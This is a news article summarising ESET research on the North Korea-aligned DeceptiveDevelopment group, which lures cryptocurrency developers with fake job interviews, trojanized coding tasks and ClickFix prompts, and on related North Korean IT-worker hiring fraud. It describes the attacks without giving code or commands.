ESET Research has published new findings on DeceptiveDevelopment, also called Contagious Interview. This North Korea-aligned group has become more active in recent years and focuses on stealing cryptocurrency. It targets freelance developers working on Windows, Linux, and macOS systems.
A growing threat to developers
The group’s campaigns use social engineering tricks, including fake job interviews and a method known as ClickFix, to spread malware and steal cryptocurrency.
ESET also reviewed open-source intelligence data about North Korean IT workers involved in fraudulent job schemes. This information links these workers to DeceptiveDevelopment and gives insight into how the group operates.
DeceptiveDevelopment has been active since at least 2023 and is driven by financial motives. It targets developers in cryptocurrency and Web3 projects. The group gains access through social engineering, using techniques like ClickFix and fake recruiter profiles similar to Lazarus’s Operation DreamJob. Once contact is made, it delivers trojanized code during staged job interviews. The most common malware it uses includes the BeaverTail, OtterCookie, and WeaselStore infostealers, as well as the InvisibleFerret modular remote access tool.
“DeceptiveDevelopment operators use fake recruiter profiles on social media, in a fashion similar to Lazarus’s Operation DreamJob. However, in this case, they specifically reached out to software developers, often those involved in cryptocurrency projects, providing potential victims with trojanized codebases that deploy backdoors as part of a faux job interview process,” says Peter Kálnai, one of the co-authors of the research paper. “The individuals behind all these activities trade high-end technical sophistication for a broad scale of operations and highly creative social engineering. Their malware is mostly simple, yet they manage to lure even tech-savvy targets,” adds Kálnai.
How fake job interviews lead to malware
The attackers use different methods to compromise victims, relying on social engineering. They create fake or hijacked profiles and pose as recruiters on LinkedIn, Upwork, Freelancer.com, and Crypto Jobs List. They offer fake job opportunities to gain a target’s interest. Once someone engages, they are asked to complete a coding challenge or a pre-interview task.
Beyond fake recruiter accounts, the attackers have adapted a social engineering technique called ClickFix. Victims are directed to a fake job interview site and asked to fill out a detailed application form, spending significant time on the process.
At the final stage, the site asks them to record a video answer. When the camera fails to work, the site shows an error message and provides a link labeled “How to fix.” Following the instructions, victims open a terminal and paste in a command meant to fix the problem, but instead it installs and runs malware.
Links to a broader fraud campaign
ESET’s research is based on telemetry data and reverse engineering of the group’s tools. It also connects DeceptiveDevelopment to a broader campaign run by North Korean IT workers involved in fraud. According to the FBI, this campaign has been active since at least April 2017 and has grown in recent years.
In a May 2022 joint advisory, the FBI described the campaign as a coordinated effort by North Korean workers to get jobs at overseas companies. Their salaries are then funneled back to North Korea. The workers have also stolen internal company data and used it for extortion, as stated by the FBI in January 2025.
ESET found evidence in open-source intelligence data, fake resumes, and other materials that these workers focus on jobs and contract work in Western countries, especially the United States. However, the group has shifted toward Europe, with targets in France, Poland, Ukraine, and Albania. They use AI to help with their work and to create realistic fake profiles. AI tools are used to alter photos in resumes and even swap faces in real-time video calls to match the false identity they are using.
The risks of proxy interviewing
These workers rely on platforms like Zoom, MiroTalk, FreeConference, and Microsoft Teams to carry out their schemes. Proxy interviewing poses a serious risk to employers. Hiring someone from a sanctioned country is not only unethical or potentially unproductive, but it can also lead to insider threats and significant security risks.
“The activities of North Korean IT workers constitute a hybrid threat. This fraud-for-hire scheme combines classical criminal operations, such as identity theft and synthetic identity fraud, with digital tools, which classify it as both a traditional crime and a cybercrime,” comments Kálnai.
Source link
